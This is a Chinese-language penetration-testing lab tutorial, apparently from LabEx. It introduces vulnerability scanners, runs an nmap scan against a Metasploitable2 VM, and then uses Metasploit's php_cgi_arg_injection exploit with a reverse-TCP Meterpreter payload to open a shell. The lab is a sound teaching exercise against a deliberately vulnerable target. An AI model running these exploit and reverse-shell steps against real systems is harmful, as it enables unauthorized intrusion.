简介
在本实验中,你将学习如何使用 Kali Linux 中的各种工具对目标机器进行漏洞扫描和渗透测试。目标是获得使用流行漏洞扫描工具的实践经验,并了解如何利用扫描结果进行成功的渗透攻击。实验将在 LabEx 平台上进行,你将获得一个 Kali Linux 容器作为攻击机器,以及一个 Metasploitable2 虚拟机作为目标。
在本实验中,你将学习如何使用 Kali Linux 中的各种工具对目标机器进行漏洞扫描和渗透测试。目标是获得使用流行漏洞扫描工具的实践经验,并了解如何利用扫描结果进行成功的渗透攻击。实验将在 LabEx 平台上进行,你将获得一个 Kali Linux 容器作为攻击机器,以及一个 Metasploitable2 虚拟机作为目标。
在这一步骤中,你将在 LabEx 平台上启动 Kali Linux 容器和 Metasploitable2 目标机器。
sudo virsh start Metasploitable2
等待目标机器启动,可能需要1-3分钟。
ping 192.168.122.102
按下 Ctrl+C
停止 ping。
docker run -ti --network host b5b709a49cd5 bash
ping 192.168.122.102
按下 Ctrl+C
停止 ping。
在这一步骤中,你将了解 Kali Linux 中一些流行的漏洞扫描工具。
X-scan:X-scan 是中国知名的综合性扫描工具。它完全免费,无需安装,支持中英文图形界面和命令行界面。X-scan 由著名的中国黑客组织“安全焦点”开发,自 2000 年内部测试版 0.2 以来不断改进。
Nessus:Nessus 是全球使用最广泛的漏洞扫描和分析软件之一。超过 75,000 家组织使用 Nessus 扫描其计算机系统。Nessus 由 Renaud Deraison 于 1998 年创建,旨在为互联网社区提供一个免费、功能强大、频繁更新且易于使用的远程系统安全扫描程序。
SQLmap:SQLmap 是一个自动化的 SQL 注入工具,可以扫描、检测并利用给定 URL 中的 SQL 注入漏洞。它目前支持 MS-SQL、MySQL、Oracle 和 PostgreSQL 数据库。SQLmap 采用四种独特的 SQL 注入技术:盲推断、UNION 查询、堆叠查询和基于时间的盲注入。
Nmap:Nmap 是一个功能强大且多用途的网络探索和安全审计工具。它可以用于多种用途,包括网络发现、端口扫描和漏洞检测。
现在,你将使用 Nmap 对 Metasploitable2 目标机器进行漏洞扫描。
cd ~
service postgresql start
msfdb init
msfconsole
nmap
命令扫描目标机器:nmap -sS -T4 192.168.122.102
以下是可能看到的输出示例:
[*] exec: nmap -sS -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
-sS
参数执行 TCP SYN 扫描(也称为半开或隐形扫描),-T4
将时间策略设置为激进但不会过快,以避免过多的网络流量。
按下 Ctrl+D 退出 Metasploit 控制台,然后开始检查
在这一步骤中,你将使用从 Nmap 扫描中收集的信息来利用 Metasploitable2 目标机器上的漏洞。
cd ~
msfconsole
search http
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.122.102
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.122.1
exploit
以下是可能看到的输出示例:
[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
如果漏洞利用成功,你应该能够访问目标机器的 shell。通过运行 sysinfo
等命令来验证访问权限,以显示系统信息。
如果你有时间,可以尝试探索其他漏洞扫描工具,如 Nessus、SQLmap 或 X-scan。你还可以尝试利用 Metasploitable2 目标机器上的其他漏洞。
按下 Ctrl+D 退出 Metasploit 控制台,然后开始检查
在本实验中,你学习了如何为渗透测试设置 Kali Linux 环境,并使用 Nmap 等流行的漏洞扫描工具来识别目标系统中的潜在漏洞。你还通过 Metasploit Framework 获得了利用漏洞的实践经验。这些实践知识将帮助你理解漏洞扫描和渗透测试在网络安全领域中的重要性。